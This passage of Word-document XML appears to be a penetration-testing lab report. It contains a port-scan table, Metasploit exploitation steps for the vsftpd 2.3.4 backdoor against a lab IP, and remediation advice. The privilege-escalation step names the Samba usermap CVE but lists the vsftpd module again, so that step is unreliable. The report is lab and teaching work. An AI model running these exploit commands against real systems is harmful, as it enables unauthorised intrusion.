              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>139/tcp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A4B6695" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  open  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09AB15E8" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="208FD521" w14:textId="77777777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ADA9A23" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>445/tcp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F580070" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  open 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E15ACB7" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>microsoft-ds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="366CBBAB" w14:textId="77777777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8F01526" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>512/tcp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D683B8E" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  open 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62C18DE0" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="2A1FD319" w14:textId="77777777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4685B2D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>513/tcp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27E8ED6" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  open 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C3A7824" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="5CA069BC" w14:textId="77777777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1F22DA4" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>514/tcp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2CDB1F6" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  open 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08310BDA" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="1B986E88" w14:textId="77777777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1052C57" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1099/tcp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E82AD52" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open 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63FE09B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="56" w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>rmiregistry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="3527530C" w14:textId="77777777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1D5112D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>1524/tcp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600C6E9" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open 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06DBB123" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>ingreslock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="42EA8D7C" w14:textId="77777777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0A9CA34" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>2049/tcp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CBEF45F" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open 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4B1C54A" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="81" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="183DBAAB" w14:textId="77777777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B42B393" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>2121/tcp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8EFECF7" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open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7627C0B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> ccproxy-ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="52446008" w14:textId="77777777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32EF197" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3306/tcp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AF6DB91" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">open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B51F582" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="230" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="1CEF4DA8" w14:textId="77777777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424EAA6" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5432/tcp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74AB0AE" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">open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768DCE6" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="112" w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="76CFA04C" w14:textId="77777777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382E14D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5900/tcp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F0A1472" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">open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0BF5292" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="8" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="2E5CF489" w14:textId="77777777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6458E28" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>6000/tcp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56B4277" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open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EE18FF7" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="23" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="4E25754A" w14:textId="77777777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F1E04B6" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>6667/tcp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DA784E4" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open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1EA229AC" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="70" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> irc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="1706837F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="42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E116E81" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>8009/tcp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DC8FD70" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> open 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32AFA2D5" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="96" w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ajp13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006173E6" w14:paraId="45576CC2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="33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FEF68DD" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8180/tcp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E96DC4C" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">open  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0C8E2CC0" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="720" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>unknown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="45F4325B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="130"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 6: Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443CABC5" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="88" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t xml:space="preserve"> Backdoor vulnerability (CVE-2011-2523).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66966ED1" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    $ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3426485B" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $ exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB28B46" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t xml:space="preserve">$ set RHOST 192.168.174.129 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B95C975" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>$ set RPORT 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E5CDA" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="715"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>$ run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CFEBF" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="238" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="358" w:right="-369" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C0D697" wp14:editId="18F5473C">
            <wp:extent cx="5486400" cy="5081270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C047" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="125"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 7: Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148E23EF" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="59" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usermap script vulnerability (CVE-2007-2447).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C054DE3" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:b/>
          <w:color w:val="111111"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6289C193" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>$ use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D40283" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:t>$ set RHOST 192.168.174.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35713AD3" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="1450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif TC" w:eastAsia="Noto Serif TC" w:hAnsi="Noto Serif TC" w:cs="Noto Serif TC"/>
          <w:color w:val="111111"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$ exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA8552" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="1970" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-2" w:right="-741" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14BA7D53" wp14:editId="5166994A">
            <wp:extent cx="5951220" cy="254444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7E5E" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="171"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Task 8: Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241C558" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="163"/>
        <w:ind w:hanging="197"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FTP Service (vsftpd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CC212" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="133" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Backdoor </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>(CVE-2011-2523).</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15EE052F" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67498AFA" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="132" w:line="259" w:lineRule="auto"/>
        <w:ind w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade to vsftpd 3.0.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B658DC9" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Disable FTP and use SFTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD2040" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="190"/>
        <w:ind w:hanging="197"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SMB Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CB14FB" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="133" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: RCE </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>(CVE-2007-2447)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F0EA4D" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="190"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20597566" w14:textId="77777777" w:rsidR="006173E6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="283"/>
      </w:pPr>
      <w:r>
        <w:t>Upgrade Samba to the latest version.</w:t>
      </w:r>
    </w:p>
